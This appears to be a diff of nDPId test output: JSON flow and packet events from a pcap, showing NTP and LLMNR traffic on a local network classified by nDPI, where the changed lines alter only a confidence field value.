00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1330,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1470104425786,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104425786,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0xkFAAEAGbFvAqAUQROn9hdFtAFBAFGHVDj7nf4AREAFpCQAAAQEIChoPxgTPHNz0"} 
00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1336,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":3,"flow_last_seen":1470104426276,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104426276,"pkt":"\/\/\/\/\/\/\/\/AAwpjO\/4CABFAABOZ6UAAIARUUHAqABowKj\/\/wCJAIkAOgIy8PkBEAABAAAAAAAAIEZERURDT0VCRkNGQ0VCRU9FREVCRkNDT0VQRkNFSEFBAAAgAAE="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1343,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104426973,"flow_last_seen":1470104426973,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470104426973,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"17.253.26.125","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1343,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1470104426973,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1470104426973,"pkt":"TF4M6gNlYMVHBbyMCABFwABMyLEAAEARvv3AqAUQEf0afQB7AHsAOHvnIwIG7AAAJiAAAPbJEf0afdtKfo89Puc520qBhKZDx2jbSoGEtCSHfttKgew\/d58s"} 
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1343,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104426973,"flow_last_seen":1470104426973,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470104426973,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"17.253.26.125","src_port":123,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1343,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104426973,"flow_last_seen":1470104426973,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1470104426973,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"17.253.26.125","src_port":123,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1346,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104426992,"flow_last_seen":1470104426992,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104426992,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":57148,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1470104426992,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":88,"pkt_l4_len":34,"thread_ts_msec":1470104426992,"pkt":"MzMAAQADSNIkYwreht1gAAAAACIRAf6AAAAAAAAARWjvvECxE0b\/AgAAAAAAAAAAAAAAAQAD3zwU6wAi91hE5AAAAAEAAAAAAAAIa2V2aW4tUEMAAP8AAQ=="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1346,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104426992,"flow_last_seen":1470104426992,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104426992,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":57148,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1346,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104426992,"flow_last_seen":1470104426992,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104426992,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":57148,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1347,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1470104427094,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":88,"pkt_l4_len":34,"thread_ts_msec":1470104427094,"pkt":"MzMAAQADSNIkYwreht1gAAAAACIRAf6AAAAAAAAARWjvvECxE0b\/AgAAAAAAAAAAAAAAAQAD3zwU6wAi91hE5AAAAAEAAAAAAAAIa2V2aW4tUEMAAP8AAQ=="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1348,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104427094,"flow_last_seen":1470104427094,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104427094,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":55593,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1348,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1470104427094,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104427094,"pkt":"AQBeAAD8SNIkYwreCABFAAA2fkcAAAERlKLAqAUp4AAA\/NkpFOsAIt1BROQAAAABAAAAAAAACGtldmluLVBDAAD\/AAE="} 
-00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1348,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104427094,"flow_last_seen":1470104427094,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104427094,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":55593,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1348,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104427094,"flow_last_seen":1470104427094,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104427094,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":55593,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1383,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104429964,"flow_last_seen":1470104429964,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104429964,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":64428,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1383,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1470104429964,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104429964,"pkt":"AQBeAAD8GF4PUugBCABFAAA2MWEAAAER4XjAqAU54AAA\/PusFOsAIt9AFnIAAAABAAAAAAAACFVzaGVyLVBDAAD\/AAE="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1383,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104429964,"flow_last_seen":1470104429964,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104429964,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":64428,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1383,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104429964,"flow_last_seen":1470104429964,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104429964,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":64428,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1386,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430064,"flow_last_seen":1470104430064,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430064,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":57143,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1386,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1470104430064,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":91,"pkt_l4_len":37,"thread_ts_msec":1470104430064,"pkt":"MzMAAQADuKxv2MGbht1gAAAAACURAf6AAAAAAAAA4DQHvtj5YZf\/AgAAAAAAAAAAAAAAAQAD3zcU6wAl4fcCawAAAAEAAAAAAAALY2hhcm1pbmctUEMAAP8AAQ=="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1386,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430064,"flow_last_seen":1470104430064,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430064,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":57143,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1386,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430064,"flow_last_seen":1470104430064,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430064,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":57143,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1388,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430065,"flow_last_seen":1470104430065,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430065,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":57143,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1388,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1470104430065,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1470104430065,"pkt":"AQBeAAD8uKxv2MGbCABFAAA5S8AAAAERxx3AqAUy4AAA\/N83FOsAJVssAmsAAAABAAAAAAAAC2NoYXJtaW5nLVBDAAD\/AAE="} 
-00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1388,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430065,"flow_last_seen":1470104430065,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430065,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":57143,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1388,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430065,"flow_last_seen":1470104430065,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430065,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":57143,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1389,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":1470104430065,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104430065,"pkt":"AQBeAAD8GF4PUugBCABFAAA2MWMAAAER4XbAqAU54AAA\/PusFOsAIt9AFnIAAAABAAAAAAAACFVzaGVyLVBDAAD\/AAE="} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1396,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":2,"flow_last_seen":1470104430476,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1470104430476,"pkt":"AQBeAAD8uKxv2MGbCABFAAA5S8EAAAERxxzAqAUy4AAA\/N83FOsAJVssAmsAAAABAAAAAAAAC2NoYXJtaW5nLVBDAAD\/AAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1398,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430884,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":49766,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1398,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1470104430884,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":91,"pkt_l4_len":37,"thread_ts_msec":1470104430884,"pkt":"MzMAAQADuKxv2MGbht1gAAAAACURAf6AAAAAAAAA4DQHvtj5YZf\/AgAAAAAAAAAAAAAAAQADwmYU6wAlV+upSAAAAAEAAAAAAAALY2hhcm1pbmctUEMAAP8AAQ=="} 
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1398,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430884,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":49766,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1398,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430884,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":49766,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430884,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":49766,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1470104430884,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1470104430884,"pkt":"AQBeAAD8uKxv2MGbCABFAAA5S8UAAAERxxjAqAUy4AAA\/MJmFOsAJdEfqUgAAAABAAAAAAAAC2NoYXJtaW5nLVBDAAD\/AAE="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430884,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":49766,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104430884,"flow_last_seen":1470104430884,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104430884,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":49766,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1403,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":2,"flow_last_seen":1470104431294,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":91,"pkt_l4_len":37,"thread_ts_msec":1470104431294,"pkt":"MzMAAQADuKxv2MGbht1gAAAAACURAf6AAAAAAAAA4DQHvtj5YZf\/AgAAAAAAAAAAAAAAAQADwmYU6wAlV+upSAAAAAEAAAAAAAALY2hhcm1pbmctUEMAAP8AAQ=="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1416,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432318,"flow_last_seen":1470104432318,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104432318,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59062,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1416,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1470104432318,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104432318,"pkt":"AQBeAAD8SNIkYzEACABFAAA2OyoAAAER17zAqAUs4AAA\/Oa2FOsAIkMsz20AAAABAAAAAAAACGphc29uLVBDAAD\/AAE="} 
-00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1416,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432318,"flow_last_seen":1470104432318,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104432318,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59062,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1416,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432318,"flow_last_seen":1470104432318,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104432318,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59062,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1420,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432630,"flow_last_seen":1470104432630,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104432630,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":58468,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1420,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1470104432630,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1470104432630,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACMRAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD5GQU6wAjSCvt1AAAAAEAAAAAAAAJV0FOR1MtTFRXAAD\/AAE="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1420,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104432630,"flow_last_seen":1470104432630,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104432630,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":58468,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 